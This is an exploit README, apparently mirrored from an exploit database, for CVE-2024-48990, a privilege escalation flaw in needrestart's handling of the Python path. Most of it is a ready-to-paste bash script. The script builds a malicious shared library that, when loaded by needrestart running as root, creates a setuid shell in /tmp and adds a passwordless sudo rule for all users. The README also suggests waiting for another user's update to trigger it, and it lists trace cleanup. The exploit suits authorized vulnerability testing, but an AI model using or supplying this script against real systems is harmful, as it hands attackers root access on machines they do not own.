## https://sploitus.com/exploit?id=2F171AF1-80B7-5C9B-8E2E-5475681D3DB6
# CVE-2024-48990-PoC-Testing ππ
This repository contains a **Proof of Concept (PoC)** to demonstrate a **vulnerability in the `needrestart` program**, which fails to set Python's path correctly, leading to potential privilege escalation. The PoC highlights a potential path for gaining elevated privileges by exploiting this flaw.
<p align="center">
<img src="https://github.com/pentestfunctions/CVE-2024-48990-PoC-Testing/blob/main/images/usecase.gif?raw=true">
</p>
## β οΈ Vulnerability Overview
The **CVE-2024-48990** vulnerability lies within the `needrestart` package. Specifically, it does not properly set Pythonβs path, which can be exploited to escalate privileges when triggered by certain actions.
This PoC simulates a scenario where a malicious shared library is loaded via Python to manipulate system settings and gain elevated privileges. Use it in a controlled, safe environment for testing purposes only.
To check if you are vulnerable run:
```
needrestart --version | grep -q "3.7" && echo "Definitely vulnerable" || echo "Version is potentially not vulnerable, this simply checks for 3.7"
```
If you want a vulnerable version to test with simply run:
```
sudo apt install needrestart=3.7-3
```
---
## β‘ How to Trigger the Vulnerability
To trigger the vulnerability, execute the following while you have the listener script running:
```bash
sudo apt remove ntp; sudo apt install ntp
```
This command installs a package (`ntp` in this case) which causes the issue with `needrestart` to be triggered however ideally you would wait for another user on the system to proc an update or something tha triggers needrestart such as sudo apt update.
---
---
## π¨ Steps to Reproduce
Run the following script to set up the PoC and trigger the vulnerability, you can copy paste it directly as the whole script as is into your terminal and wait or trigger it manually as shown above with ntp. It also adds the binary to sudo path for all users for showcasing - realistcally you can just make it add all paths for sudo for your user but I wanted to show both:
```bash
#!/bin/bash
set -e
cd /tmp
mkdir -p malicious/importlib
# Create and compile the malicious library
cat << 'EOF' > /tmp/malicious/lib.c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
static void a() __attribute__((constructor));
void a() {
if(geteuid() == 0) { // Only execute if we're running with root privileges
setuid(0);
setgid(0);
const char *shell = "cp /bin/sh /tmp/poc; "
"chmod u+s /tmp/poc; "
"grep -qxF 'ALL ALL=NOPASSWD: /tmp/poc' /etc/sudoers || "
"echo 'ALL ALL=NOPASSWD: /tmp/poc' | tee -a /etc/sudoers > /dev/null &";
system(shell);
}
}
EOF
gcc -shared -fPIC -o "/tmp/malicious/importlib/__init__.so" /tmp/malicious/lib.c
# Minimal Python script to trigger import
cat << 'EOF' > /tmp/malicious/e.py
import time
while True:
try:
import importlib
except:
pass
if __import__("os").path.exists("/tmp/poc"):
print("Got shell!, delete traces in /tmp/poc, /tmp/malicious")
__import__("os").system("sudo /tmp/poc -p")
break
time.sleep(1)
EOF
cd /tmp/malicious; clear;echo -e "\n\nWaiting for norestart execution...\nEnsure you remove yourself from sudoers on the poc file after\nsudo sed -i '/ALL ALL=NOPASSWD: \/tmp\/poc/d' /etc/sudoers\nAs well as remove excess files created:\nrm -rf malicious/ poc"; PYTHONPATH="$PWD" python3 e.py 2>/dev/null
```
## π₯ Cleanup Script
If you'd like to clean up testing files and remove yourself from `sudoers`, you can run the following from an elevated prompt:
```bash
sudo sed -i '/ALL ALL=NOPASSWD: \/tmp\/poc/d' /etc/sudoers
rm -rf malicious/ poc; ls
```
---
## π οΈ Requirements
- **Linux-based system** (Ubuntu/Debian recommended)
- **`needrestart` package** installed (or removed and reinstalled to trigger)
- **Python 3.x** installed (for running the Python script)
---
## π¨ Warning
This PoC is for **testing purposes only** and should not be used in a production environment. Exploiting this vulnerability in unauthorized environments may be illegal. Always obtain explicit permission before conducting any security testing.
---
## π Resources
- GitHub Repository: [CVE-2024-48990-PoC](https://github.com/makuga01/CVE-2024-48990-PoC/)
- CVE Details: [CVE-2024-48990](https://vulners.com/cve/CVE-2024-48990)
---
Happy testing! π§ͺπ